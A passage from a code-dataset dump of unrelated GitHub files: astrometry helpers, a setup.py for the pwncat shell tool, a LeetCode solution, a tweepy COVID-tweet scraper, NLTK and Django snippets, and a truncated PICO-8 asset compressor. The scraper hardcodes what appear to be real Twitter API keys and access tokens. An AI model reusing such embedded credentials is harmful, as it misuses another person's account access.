sextracted[sextractor_ra_name] - cat[ra_name]\n offsets_dec = sextracted[sextractor_dec_name] - cat[dec_name]\n\n offset_ra = np.nanmedian(offsets_ra)\n offset_dec = np.nanmedian(offsets_dec)\n\n # TODO: This is quick and dirty and will only work if the image is approximately oriented along x=RA\n # and y=DEC (CROTA ~ 0)\n\n if offset_ra is not None and offset_dec is not None:\n\n param_dict['offset_ra'] = float(offset_ra)\n param_dict['offset_dec'] = float(offset_dec)\n\n image = offset_astrometry(hdu=image, offset_ra=offset_ra, offset_dec=offset_dec, output=destination)\n\n if show and not manual:\n wcs_info = wcs.WCS(header=header)\n cat['x'], cat['y'] = wcs_info.all_world2pix(cat[ra_name], cat[dec_name], 0)\n x, y = wcs_info.all_world2pix(sextracted[sextractor_ra_name] - offset_ra,\n sextracted[sextractor_dec_name] - offset_dec, 0)\n\n if show:\n plt.subplot(projection=wcs_info)\n plt.imshow(data, norm=norm, origin='lower', cmap='viridis')\n plt.scatter(x, y, label='SExtractor', c='violet')\n plt.scatter(cat['x'], cat['y'], label=cat_name, c='red')\n plt.legend()\n plt.title('Post-Correction')\n plt.show()\n\n image.close()\n return param_dict\n\n\ndef tweak_final(sextractor_path: str, destination: str,\n epoch: str, instrument: str,\n show: bool, tolerance: float = 10.,\n output_suffix: str = 'astrometry', input_suffix='coadded',\n stars_only: bool = False, path_add: str = 'subtraction_image',\n manual: bool = False, specific_star: bool = False):\n \"\"\"\n A wrapper for tweak, to interface with the .yaml param files and provide offsets to all filters used in an\n observation.\n :param sextractor_path: Path to SExtractor-generated catalogue.\n :param destination: Directory to write tweaked image to.\n :param epoch: The epoch number of the observation to be tweaked.\n :param instrument: The instrument on which the observation was taken.\n :param show: Plot matches onscreen?\n :param tolerance: Tolerance, in pixels, within which matches will be accepted.\n :param output_suffix: String to append to filename of output file.\n :param input_suffix: Suffix appended to filenmae of input file.\n :param stars_only: Only match using stars, determined using SExtractor's 'class_star' output.\n :param path_add: Key under which to add the output path in the 'output_paths.yaml' file.\n :param manual: Use manual offset?\n :param specific_star: Use a specific star to tweak? This means, instead of finding the closest matches for many\n stars, alignment is attempted with a single star nearest the given position.\n :return: None\n \"\"\"\n u.mkdir_check(destination)\n properties = p.object_params_instrument(obj=epoch, instrument=instrument)\n frb_properties = p.object_params_frb(obj=epoch[:-2])\n cat_name = properties['cat_field_name']\n manual = properties['manual_astrometry'] and manual\n cat_path = frb_properties['data_dir'] + cat_name.upper() + \"/\" + cat_name.upper() + \".csv\"\n\n if cat_path is not None:\n\n outputs = p.object_output_params(obj=epoch, instrument=instrument)\n filters = outputs['filters']\n\n param_dict = {}\n\n for filt in filters:\n\n print(filt)\n\n f = filt[0]\n\n if manual:\n\n offset_x = properties[f + '_offset_x']\n offset_y = properties[f + '_offset_y']\n\n else:\n offset_x = None\n offset_y = None\n\n if specific_star:\n burst_properties = p.object_params_frb(epoch[:-2])\n star_ra = burst_properties['alignment_ra']\n star_dec = burst_properties['alignment_dec']\n\n else:\n star_ra = star_dec = None\n\n param = tweak(sextractor_path=sextractor_path + f + '_psf-fit.cat',\n destination=destination + f + '_' + output_suffix + '.fits',\n image_path=destination + f + '_' + input_suffix + '.fits',\n cat_path=cat_path,\n cat_name=cat_name, tolerance=tolerance, show=show, stars_only=stars_only, manual=manual,\n offset_x=offset_x, offset_y=offset_y, specific_star=specific_star, star_ra=star_ra,\n star_dec=star_dec)\n\n for par in param:\n param_dict[f + '_' + par] = param[par]\n\n p.add_output_path(obj=epoch, key=f + '_' + path_add,\n path=destination + f + '_' + output_suffix + '.fits',\n instrument=instrument)\n\n p.add_params(properties['data_dir'] + 'output_values.yaml', params=param_dict)\n\n else:\n print('No catalogue found for this alignment.')\n","repo_name":"Lachimax/craftutils","sub_path":"src/craftutils/astrometry.py","file_name":"astrometry.py","file_ext":"py","file_size_in_byte":14950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30862889896","text":"\"\"\"Pip configuration.\"\"\"\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"pwncat\",\n version=\"0.1.2\",\n description=\"Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell and port forwarding magic - and its fully scriptable with Python (PSE).\",\n license=\"MIT\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"cytopia\",\n author_email=\"cytopia@everythingcli.org\",\n url=\"https://pwncat.org/\",\n install_requires=[],\n scripts=[\n \"bin/pwncat\"\n ],\n project_urls={\n 'Source Code': 'https://github.com/cytopia/pwncat',\n 'Documentation': 'https://docs.pwncat.org/',\n 'Bug Tracker': 'https://github.com/cytopia/pwncat/issues',\n },\n classifiers=[\n # https://pypi.org/classifiers/\n #\n # How mature is this project\n \"Development Status :: 4 - Beta\",\n # Indicate who your project is intended for\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: System Administrators\",\n # Project topics\n \"Topic :: Communications :: Chat\",\n \"Topic :: Communications :: File Sharing\",\n \"Topic :: Internet\",\n \"Topic :: Security\",\n \"Topic :: System :: Shells\",\n \"Topic :: System :: Systems Administration\",\n \"Topic :: Utilities\",\n # License\n \"License :: OSI Approved :: MIT License\",\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n # How does it run\n \"Environment :: Console\",\n # Where does it rnu\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"cytopia/pwncat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1653,"dataset":"github-code","pt":"29"} +{"seq_id":"418521595","text":"class Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n # using sliding window and hash values\n \"\"\"\n ans = []\n s -> cbaebabacd\n p -> abc\n lP = 10\n lS = 3\n S = hash(a) + hash(b) + hash(c)\n P = hash(c) + hash(b) + hash(a) = hash(abc)\n base condition:\n S == P -> \n ans = [0]\n for loop:\n S = hash(b) + hash(a) + hash(e)\n S != P\n S = hash(a) + hash(e) + hash(b)\n S != P\n S = hash(e) + hash(b) + hash(a)\n S != P\n S = hash(b) + hash(a) + hash(b)\n S != P\n S = hash(a) + hash(b) + hash(a)\n S != P\n S = hash(a) + hash(b) + hash(c)\n S == P\n ans = [6]\n \"\"\"\n ans = []\n lP = len(p)\n lS = len(s)\n S,P = 0,0\n if (lS < lP):\n return []\n for i in range(lP):\n S += hash(s[i])\n P += hash(p[i])\n if S==P:\n ans.append(0)\n for i in range(lP, lS):\n S += hash(s[i]) - hash(s[i-lP])\n if (S == P):\n ans.append(i-lP + 1)\n return ans","repo_name":"amya-singhal/Leetcode","sub_path":"0438-find-all-anagrams-in-a-string/0438-find-all-anagrams-in-a-string.py","file_name":"0438-find-all-anagrams-in-a-string.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42886248398","text":"\r\n #-*- coding:utf-8 -*-\r\nimport tweepy\r\nimport csv\r\nimport locale\r\nlocale.setlocale(locale.LC_ALL, \"Turkish\")\r\nconsumer_key = \"vdRk3b1NYDyKktFscyxn5LlLy\"\r\nconsumer_secret = \"StQafrPKHedWOKz5j0Eb4EgL6gZ3o1tE6tw91dPxjI05cZYL2q\"\r\naccess_token = \"1072416826351599616-xPctnCFfAjS1zr2DplUGZEJef8X3eV\"\r\naccess_token_secret = \"SawkFaezzt0zRfH7MM8vEIo2jhplXIdiep5QMspeEkmLW\"\r\n\r\ntry:\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n api = tweepy.API(auth,wait_on_rate_limit=True)\r\nexcept tweepy.TweepError:\r\n print ('Authentication Error')\r\n \r\ncsvFile = open('Nisan13.csv', 'a', encoding='utf-8')\r\ncsvWriter = csv.writer(csvFile)\r\n\r\nstartsince = '2021-04-13'\r\nendUntil = '2021-04-14'\r\n\r\ntweet_max_boyut = 280\r\n\r\ntotal_tweets=[]\r\n\r\nfor status in tweepy.Cursor(api.search,\r\n q=\"korona\", \r\n since =startsince, until=endUntil,languages='Turkish',\r\n tweet_mode='extended').items(99999):\r\n \r\n if len(status.full_text) > tweet_max_boyut:\r\n \r\n united_tweet = []\r\n cut = status.full_text[:tweet_max_boyut] \r\n status.full_text = status.full_text[tweet_max_boyut:]\r\n united_tweet.append(cut+status.full_text)\r\n \r\n for x in united_tweet:\r\n \r\n if x not in total_tweets:\r\n csvWriter.writerow([status.created_at ,status.retweet_count, x])\r\n total_tweets.append(x)\r\n \r\n else:\r\n \r\n print (\"Text:\", status.full_text)\r\n if status.full_text not in total_tweets:\r\n csvWriter.writerow([status.created_at ,status.retweet_count, status.full_text])\r\n total_tweets.append(status.full_text)\r\n","repo_name":"Emineckmkc/BitirmeProjesi","sub_path":"src/verisetihazirlama.py","file_name":"verisetihazirlama.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"74538091598","text":"import sys\r\nimport string\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nimport pandas\r\n\r\ntexts = \"\"\r\n\r\ndef main():\r\n\r\n with open('01.txt', 'r') as f:\r\n texts = \"\".join(line.rstrip('\\n') for line in f)\r\n \r\n texts = texts.lower()\r\n texts = texts.replace(r'[^\\w\\s]','')\r\n stop = stopwords.words('english')\r\n \r\n words = texts.split()\r\n for w in words:\r\n if w in stop:\r\n words.remove(w)\r\n \r\n print(len(words))\r\n \r\n \r\n print(check('social', words))\r\n\r\n \r\n freq = pandas.Series(words).value_counts()[:50]\r\n print(freq)\r\n\r\n\r\n\r\ndef check(word, words):\r\n \"\"\"Return true if word is in file else false\"\"\"\r\n COUNT = 0\r\n for elem in words:\r\n if elem.lower() == word:\r\n COUNT = COUNT + 1\r\n return COUNT\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"EvPng/text-analysis","sub_path":"T.py","file_name":"T.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22581127551","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"pinboard\", \"0001_initial\"),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name=\"bookmark\",\n name=\"shared\",\n ),\n migrations.AlterField(\n model_name=\"bookmark\",\n name=\"raw\",\n field=models.TextField(\n help_text=b\"eg, the raw JSON from the API.\", blank=True\n ),\n ),\n ]\n","repo_name":"philgyford/django-ditto","sub_path":"ditto/pinboard/migrations/0002_auto_20150626_1521.py","file_name":"0002_auto_20150626_1521.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"29"} +{"seq_id":"7243328756","text":"from shared import readAssets\nfrom shared import swapNibbles\nfrom classes import assetCompressed\n\nfrom compress.rle import *\nfrom compress.huffman import *\nfrom compress.hilbert import *\n\nimport math\n\ndef compressAsset(asset, args):\n\n\tglobal totalSize\n\tglobal totalSizeWithoutHilbert\n\tglobal totalSizeWithoutRLE\n\tglobal totalSizeWithoutHuffman\t\n\tglobal currentAssetIndex\n\tglobal amountOfAssets\t\n\tglobal commandStringData\t\n\tglobal usesHilbert\n\tglobal usesRLE\n\tglobal usesHuffman\n\t\n\tif asset.bitmap != None:\n\t\ttype = \"bitmap\"\n\t\tscanlineWidth = len(asset.bitmap[0])\n\t\tdataLinearRaw = \"\"\n\t\tfor line in asset.bitmap:\n\t\t\tdataLinearRaw += line\n\t\tdataLinearRaw = swapNibbles(dataLinearRaw)\n\telse:\n\t\ttype = \"generic\"\n\t\tscanlineWidth = len(asset.data)\n\t\tdataLinearRaw = asset.data\n\t\t\n\twinnerMethodID = 0\n\twinnerData = dataLinearRaw\n\twinnerSize = len(dataLinearRaw)\n\tbestWithoutRLE = winnerSize\n\tbestWithoutHuffman = winnerSize\n\tbestWithoutHilbert = winnerSize\n\t\n\tprint(\"Compressing asset \" + str(currentAssetIndex) + \" out of \" + str(amountOfAssets) + \" (name: \" + asset.name + \", type: \" + type + \", size: \" + str(len(dataLinearRaw))+\")\")\n\t\n\tverificationFailures = []\n\t\n\tif type == \"bitmap\" and args.no_hilbert == False:\n\t \n\t\tdataHilbertRaw = swapNibbles(hilbertMap(asset.bitmap))\n\t\t\n\t\trleFailed = False\n\t\t\n\t\tif args.no_rle == False:\n\t\t\tdataHilbertRLE = rleCompress(dataHilbertRaw)\n\t\t\tif rleDecompress(dataHilbertRLE) != dataHilbertRaw:\n\t\t\t\tverificationFailures.append(\" - Hilbert mapping, RLE\")\n\t\t\t\trleFailed == True\n\t\t\telse:\n\t\t\t\tbestWithoutHuffman = min(len(dataHilbertRLE), bestWithoutHuffman)\n\t\t\t\tif len(dataHilbertRLE) < winnerSize:\n\t\t\t\t\twinnerSize = len(dataHilbertRLE)\n\t\t\t\t\twinnerMethodID = 6\n\t\t\t\t\twinnerData = dataHilbertRLE\n\t\t\t\t\t\n\t\tif args.no_huffman == False:\n\t\t\tdataHilbertHuffman = huffmanCompress(dataHilbertRaw)\n\t\t\tif huffmanDecompress(dataHilbertHuffman) != dataHilbertRaw:\n\t\t\t\tverificationFailures.append(\" - Hilbert mapping, Huffman coding\")\n\t\t\telse:\n\t\t\t\tbestWithoutRLE = min(len(dataHilbertHuffman), bestWithoutRLE)\n\t\t\t\tif len(dataHilbertHuffman) < winnerSize:\n\t\t\t\t\twinnerSize = len(dataHilbertHuffman)\n\t\t\t\t\twinnerMethodID = 5\n\t\t\t\t\twinnerData = dataHilbertHuffman\n\t\t\t\t\t\n\t\tif args.no_rle == False and args.no_huffman == False and rleFailed == False:\n\t\t\tdataHilbertBoth = huffmanCompress(dataHilbertRLE)\n\t\t\tif huffmanDecompress(dataHilbertBoth) != dataHilbertRLE:\n\t\t\t\tverificationFailures.append(\" - Hilbert mapping, RLE to Huffman coding\")\n\t\t\telif len(dataHilbertBoth) < winnerSize:\n\t\t\t\twinnerSize = len(dataHilbertBoth)\n\t\t\t\twinnerMethodID = 7\n\t\t\t\twinnerData = dataHilbertBoth\n\t\t\t\t\n\trleFailed = False\n\t\n\terrorMessageStart = \"\"\n\tif type == \"bitmap\" and args.no_hilbert == False:\n\t\terrorMessageStart = \"Linear mapping, \"\n\t\n\tif args.no_rle == False:\n\t\tdataLinearRLE = rleCompress(dataLinearRaw)\n\t\tif rleDecompress(dataLinearRLE) != dataLinearRaw:\n\t\t\tverificationFailures.append(\" - \" + errorMessageStart + \"RLE\")\n\t\t\trleFailed = True\n\t\telse:\n\t\t\tbestWithoutHuffman = min(len(dataLinearRLE), bestWithoutHuffman)\n\t\t\tbestWithoutHilbert = min(len(dataLinearRLE), bestWithoutHilbert) \n\t\t\tif len(dataLinearRLE) < winnerSize:\n\t\t\t\twinnerSize = len(dataLinearRLE)\n\t\t\t\twinnerMethodID = 2\n\t\t\t\twinnerData = dataLinearRLE\n\t\t\t\t\t\n\tif args.no_huffman == False:\n\t\tdataLinearHuffman = huffmanCompress(dataLinearRaw)\n\t\tif huffmanDecompress(dataLinearHuffman) != dataLinearRaw:\n\t\t\tverificationFailures.append(\" - \" + errorMessageStart + \"Huffman coding\")\n\t\telse:\n\t\t\tbestWithoutRLE = min(len(dataLinearHuffman), bestWithoutRLE)\n\t\t\tbestWithoutHilbert = min(len(dataLinearHuffman), bestWithoutHilbert)\n\t\t\tif len(dataLinearHuffman) < winnerSize:\n\t\t\t\twinnerSize = len(dataLinearHuffman)\n\t\t\t\twinnerMethodID = 1\n\t\t\t\twinnerData = dataLinearHuffman\n\t\t\t\t\t\n\tif args.no_rle == False and args.no_huffman == False:\n\t\tdataLinearBoth = huffmanCompress(dataLinearRLE)\n\t\tif huffmanDecompress(dataLinearBoth) != dataLinearRLE:\n\t\t\tverificationFailures.append(\" - \" + errorMessageStart + \"RLE to Huffman coding\")\n\t\telse:\n\t\t\tbestWithoutHilbert = min(len(dataLinearBoth), bestWithoutHilbert)\n\t\t\tif len(dataLinearBoth) < winnerSize:\n\t\t\t\twinnerSize = len(dataLinearBoth)\n\t\t\t\twinnerMethodID = 3\n\t\t\t\twinnerData = dataLinearBoth \n\t\n\tif winnerMethodID % 4 == 0:\n\t\twinnerMethod = \"Raw\"\n\tif winnerMethodID % 4 == 1:\n\t\twinnerMethod = \"Huffman coding\"\n\t\tusesHuffman = True\n\tif winnerMethodID % 4 == 2:\n\t\twinnerMethod = \"RLE\"\n\t\tusesRLE = True\n\tif winnerMethodID % 4 == 3:\n\t\twinnerMethod = \"RLE to Huffman coding\"\n\t\tusesRLE = True\n\t\tusesHuffman = True\n\t\n\tif type == \"bitmap\" and args.no_hilbert == False:\n\t\tif winnerMethodID <= 4:\n\t\t\twinnerMethod = \"Linear mapping, \" + winnerMethod\n\t\telse:\n\t\t\twinnerMethod = \"Hilbert mapping, \" + winnerMethod\n\t\t\tusesHilbert = True\n\t\t\t\n\tprint(\"Compressed size: \" + str(winnerSize) + \" (\" + winnerMethod + \")\")\n\t\n\tif len(verificationFailures) > 0:\n\t\tprint(\"Verification failures detected:\")\n\t\tfor line in verificationFailures:\n\t\t\tprint(line)\n\t\t\t\n\tnewAssetCompressed = assetCompressed(asset.name, type, winnerData, scanlineWidth, winnerSize, totalSize, winnerMethodID)\n\t\n\ttotalSize += winnerSize\n\ttotalSizeWithoutHilbert += bestWithoutHilbert\n\ttotalSizeWithoutRLE += bestWithoutRLE\n\ttotalSizeWithoutHuffman += bestWithoutHuffman\n\t\n\tcurrentAssetIndex += 1\n\t\n\tprint(\"\")\n\t\n\tcommandStringData += str(winnerSize) + \"_\"\n\t\n\tif type == \"bitmap\":\n\t\tcommandStringData += str(scanlineWidth) + \"_\" + str(len(asset.bitmap) - 1)\n\telse:\n\t\tcommandStringData += str(scanlineWidth) + \"_0\"\n\t\t\n\tfor i in range(0, 3):\n\t\tcommandStringData += \"_\" + str(winnerMethodID >> i & 1)\n\t\t\n\tcommandStringData += \"|\"\n\n\treturn newAssetCompressed\n\t\ndef encodeOutputCartData(args):\n\n # encode compressed data into the .p8 format\n\n\tglobal compressedAssets\n\tglobal outputGfxArea\n\tglobal outputMapArea\n\tglobal outputGffArea\n\tglobal outputMusicArea\n\tglobal outputSfxArea\n\t\n\tglobal writeGfxArea\n\tglobal writeMapArea\n\tglobal writeGffArea\n\tglobal writeMusicArea\n\tglobal writeSfxArea\n\t\n\tglobal overflowData\n\t\n\tcartDataString = \"\"\n\t\n\tfor asset in compressedAssets:\n\t\tcartDataString += asset.data\n\t\t\n\t# encode __gfx__\n\t\n\tgfxDataString = cartDataString[:16384]\n\twhile len(gfxDataString) % 2 != 0:\n\t\tgfxDataString += \"0\"\n\t\t\n\toutputGfxArea.append(\"__gfx__\\n\")\n\t\n\toutputLine = \"\"\n\n\tfor i in range(0, len(gfxDataString), 2):\n\t\toutputByte = gfxDataString[i + 1] + gfxDataString[i]\n\t\toutputLine += outputByte\n\t\tif len(outputLine) == 128 or i == len(gfxDataString) - 2:\n\t\t\twhile len(outputLine) < 128:\n\t\t\t\toutputLine += \"0\"\n\t\t\toutputGfxArea.append(outputLine + \"\\n\")\n\t\t\toutputLine = \"\"\n\t\n\tif not args.gfx_only:\n\t\n\t\t# encode __map__\n\t\t\n\t\tif len(cartDataString) > 16384:\n\t\t\n\t\t\twriteMapArea = True\n\t\t\n\t\t\tmapDataString = cartDataString[16384 : 24576]\n\t\t\n\t\t\toutputMapArea.append(\"__map__\\n\")\n\n\t\t\tfor i in range(0, len(mapDataString), 256):\n\t\t\t\toutputLine = mapDataString[i : i + 256]\n\t\t\t\twhile len(outputLine) < 256:\n\t\t\t\t\toutputLine = outputLine + \"0\"\n\t\t\t\toutputMapArea.append(outputLine + \"\\n\")\n\t\t\t\n\t\t# encode __gff__\n\t\t\n\t\tif len(cartDataString) > 24576:\n\t\t\n\t\t\twriteGffArea = True\n\t\t\n\t\t\tgffDataString = cartDataString[24576 : 25088]\n\t\t\twhile len(gffDataString) < 512:\n\t\t\t\tgffDataString += \"0\"\n\t\t\n\t\t\toutputGffArea.append(\"__gff__\\n\")\n\t\t\n\t\t\tfor i in range(0, 512, 256):\n\t\t\t\toutputGffArea.append(gffDataString[i : i+256] + \"\\n\")\n\t\t\t\t\n\t\tif not args.spare_music:\n\t\t\n\t\t\t# encode __music__\n\t\t\n\t\t\tif len(cartDataString) > 25088:\n\t\t\t\n\t\t\t\twriteMusicArea = True\n\t\t\n\t\t\t\tmusicDataString = cartDataString[25088 : 25600]\n\n\t\t\t\toutputMusicArea.append(\"__music__\\n\")\n\t\n\t\t\t\tfor i in range(0, len(musicDataString), 8):\n\t\t\t\t\tinputPattern = musicDataString[i : i + 8]\n\t\t\t\t\twhile len(inputPattern) < 8:\n\t\t\t\t\t\tinputPattern = inputPattern + \"0\"\n\t\t\t\t\tflagNibble = 0\n\t\t\t\t\tflagBitValue = 1\n\t\t\t\t\tstrChannels = \"\"\n\t\t\t\t\tfor j in range(0, 8, 2):\n\t\t\t\t\t\tinputHex = inputPattern[j : j + 2]\n\t\t\t\t\t\tinputDec = int(inputHex, 16)\n\t\t\t\t\t\tif inputDec > 127: #checks if flag bit if set\n\t\t\t\t\t\t\tflagNibble += flagBitValue\n\t\t\t\t\t\tflagBitValue *= 2 \n\t\t\t\t\t\tchannelDec = inputDec & 127 #bitwise and, gets the channel bits\n\t\t\t\t\t\tchannelHex = format(channelDec, \"02x\")\n\t\t\t\t\t\tstrChannels = strChannels + channelHex\n\t\t\t\t\tflagNibbleInHex = format(int(flagNibble), \"02x\")\n\t\t\t\t\toutputMusicArea.append(flagNibbleInHex + \" \" + strChannels + \"\\n\")\n\t\t\t\n\t\t\t# encode __sfx__\n\t\t\n\t\t\tif len(cartDataString) > 25600:\n\t\t\t\n\t\t\t\twriteSfxArea = True\n\t\t\n\t\t\t\tsfxDataString = cartDataString[25600 : 34304]\n\t\t\t\toutputSfxArea.append(\"__sfx__\\n\")\n\t\t\n\t\t\t\tfor i in range(0, len(sfxDataString), 136):\n\t\t\t\t\tinputSound = sfxDataString[i : i + 136]\n\t\t\t\t\twhile len(inputSound) < 136:\n\t\t\t\t\t\tinputSound = inputSound + \"0\"\n\t\t\t\t\toutputNotes = \"\"\n\t\t\t\t\tfor j in range(0, 128, 4):\n\t\t\t\t\t\tnoteHex = inputSound[j + 2 : j + 4] + inputSound[j : j + 2]\n\t\t\t\t\t\tnoteDec = int(noteHex, 16)\n\t\t\t\t\t\tnoteBinary = format(noteDec, \"016b\")\n\t\t\t\t\t\tinstrumentFlag = int(noteBinary[0], 2)\n\t\t\t\t\t\teffectDec = int(noteBinary[1 : 4], 2)\n\t\t\t\t\t\tvolumeDec = int(noteBinary[4 : 7], 2)\n\t\t\t\t\t\twaveformDec = int(noteBinary[7 : 10], 2) + 8 * instrumentFlag\n\t\t\t\t\t\tpitchDec = int(noteBinary[10 : 16], 2)\n\t\t\t\t\t\tpitchHex = format(pitchDec, \"02x\")\n\t\t\t\t\t\twaveformHex = format(waveformDec, \"x\")\n\t\t\t\t\t\tvolumeHex = format(volumeDec, \"x\")\n\t\t\t\t\t\teffectHex = format(effectDec, \"x\")\n\t\t\t\t\t\toutputNotes = outputNotes + pitchHex + waveformHex + volumeHex + effectHex\n\t\t\t\t\toutputHeader = inputSound[128 : 136]\n\t\t\t\t\toutputSfxArea.append(outputHeader + outputNotes + \"\\n\")\n\t\t\t\t\t\n\tif len(cartDataString) > usableCartData:\n\t\toverflowData = cartDataString[usableCartData :]\n \ndef doPack(args):\n\n\tprint(\"Larkstongue v0.0.1-alpha\")\n \n # set global variables\n\t\n\tglobal totalSize\n\tglobal totalSizeWithoutHilbert\n\tglobal totalSizeWithoutRLE\n\tglobal totalSizeWithoutHuffman\n\t\n\ttotalSize = 0\n\ttotalSizeWithoutHilbert = 0\n\ttotalSizeWithoutRLE = 0\n\ttotalSizeWithoutHuffman = 0\n\t\n\tglobal writeGfxArea\n\tglobal writeMapArea\n\tglobal writeGffArea\n\tglobal writeMusicArea\n\tglobal writeSfxArea\n\t\n\twriteGfxArea = True\n\twriteMapArea = False\n\twriteGffArea = False\n\twriteMusicArea = False\n\twriteSfxArea = False\n\t\n\tglobal usableCartData\n\t\n\tif args.gfx_only:\n\t\tusableCartData = 16384\n\telif args.spare_music:\n\t\tusableCartData = 25088\n\telse:\n\t\tusableCartData = 34304\n\t\t\n\tglobal overflowData\n\toverflowData = \"\"\n\n\tglobal compressedAssets\n\tcompressedAssets = []\n\n\tglobal commandStringData\n\tcommandStringData = \"\"\n\n\tglobal outputGfxArea\n\tglobal outputMapArea\n\tglobal outputGffArea\n\tglobal outputMusicArea\n\tglobal outputSfxArea\n\t\n\toutputGfxArea = []\n\toutputMapArea = []\n\toutputGffArea = []\n\toutputMusicArea = []\n\toutputSfxArea = [] \n\t\t\n\tglobal usesHilbert\n\tglobal usesRLE\n\tglobal usesHuffman\n\t\n\tusesHilbert = False\n\tusesRLE = False\n\tusesHuffman = False\n\t\n\tassetList = readAssets(args.input, True)\n \n # check for duplicate names\n\t\n\tdupeList = []\n\tfor asset in assetList:\n\t\tif asset.name in dupeList:\n\t\t\tprint(\"Error! The name \\\"\" + asset.name + \"\\\" appears in \" + args.input + \" more than once\")\n\t\t\tquit()\n\t\tdupeList.append(asset.name)\n\t\n\tglobal amountOfAssets\n\tglobal currentAssetIndex\n\t\t\n\tamountOfAssets = len(assetList)\n\tcurrentAssetIndex = 1\n\t\n\ttotalRawSize = 0\n\tfor asset in assetList:\n\t\ttotalRawSize += asset.size\n \n # compress assets\n\n\tprint(\"Compressing \" + str(amountOfAssets) + \" assets, total size \" + str(totalRawSize) + \" nibbles\")\n\t\n\tprint(\"\")\n\t\n\tstartPopping = False\n\tpopToArea = None\n\t\n\tfor asset in assetList:\n\t\tcompressedAssets.append(compressAsset(asset, args))\n\t\n\tencodeOutputCartData(args)\n\t\n\t# generate loader\n\t\n\tcartDataSizeInBytes = math.ceil(min(totalSize, usableCartData) / 2)\n\t\n\tcommandStringDataStart = \"data, asset_list = mem_to_str(0, \" + str(cartDataSizeInBytes) + \")\"\n\tif len(overflowData) > 0:\n\t\tcommandStringDataStart += \"..\\\"\" + overflowData + \"\\\"\"\n\t\t\n\tcommandStringData = commandStringDataStart + \", parse_table(\\\"\" + commandStringData + \"\\\")\"\n\t\n\tcommandStringLoaderCall = \"\"\n\tfor asset in assetList:\n\t\tcommandStringLoaderCall += asset.name + \", \"\n\t\n\tcommandStringLoaderCall = commandStringLoaderCall[:-2] + \" = larkstongue_unpack(1)\"\n\t\n\tloaderFileName = args.output\n\tif \".\" in loaderFileName:\n\t\tloaderFileName = \".\".join(loaderFileName.split(\".\")[:-1])\n\tloaderFileName += \"_larkstongue.p8l\"\n\t\n\tfile = open(loaderFileName, \"w\")\n\n\tfile.write(\"function larkstongue_unpack(asset_index)\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tcls()\\n\")\n\tif args.progressbar:\n\t\tfile.write(\"\\trect(8, 60, 120, 68, 7)\\n\")\n\t\tfile.write(\"\\trectfill(10, 62, 11 + \" + str(108 / amountOfAssets) + \" * (asset_index - 1), 66, 7)\\n\")\n\tfile.write(\"\\tflip()\\n\")\n\tfile.write(\"\\tholdframe()\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tcurrent_asset = asset_list[asset_index]\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tif current_asset==nil then\\n\")\n\tfile.write(\"\\t\\treturn\\n\")\n\tfile.write(\"\\tend\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tasset_string, asset, data = sub(data,1,current_asset[1]), {}, sub(data,current_asset[1]+1)\\n\")\n\tfile.write(\"\\n\")\n\tif usesHuffman:\n\t\tfile.write(\"\\tif current_asset[4] == 1 then asset_string = huffman_decomp(asset_string) end\\n\")\n\tif usesRLE:\n\t\tfile.write(\"\\tif current_asset[5] == 1 then asset_string = rle_decomp(asset_string) end\\n\")\n\tfile.write(\"\\n\")\t\t\n\tfile.write(\"\\tfor i = 0, current_asset[3] do\\n\")\n\tfile.write(\"\\t\\tadd(asset, sub(asset_string, i * current_asset[2] + 1, (i + 1) * current_asset[2]))\\n\")\n\tfile.write(\"\\tend\\n\")\n\tif usesHilbert:\n\t\tfile.write(\"\\n\")\n\t\tfile.write(\"\\tif (current_asset[6] == 1) hilbert_unwrap()\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"\\tif asset_index <= #asset_list then\\n\")\n\tfile.write(\"\\t\\treturn asset, larkstongue_unpack(asset_index + 1)\\n\")\n\tfile.write(\"\\tend\\n\")\n\tfile.write(\"\\n\")\n\tfile.write(\"end\\n\")\n\tfile.write(\"\\n\")\n\n\tfile.write(commandStringData + \"\\n\" + commandStringLoaderCall + \"\\ndata, asset_list = nil, nil\\nmemset(0, 0, \" + str(usableCartData / 2) + \")\\ncls()\\npal()\")\n\tfile.close()\n \n # write includes and cart data to target cart\n\t\n\ttry:\n\t\tfile = open(args.output, \"r\")\n\t\tcartText = file.readlines()\n\t\tfile.close\n\texcept FileNotFoundError:\n\t\tprint(args.output + \" not found, generating new cart\")\n\t\tcartText = [\"pico-8 cartridge // http://www.pico-8.com\\n\",\n\t\t\t\t\t\"version 